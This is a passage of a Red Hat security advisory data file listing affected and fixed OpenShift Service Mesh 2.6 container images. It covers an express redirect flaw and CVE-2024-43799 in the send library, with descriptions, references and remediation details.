"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", 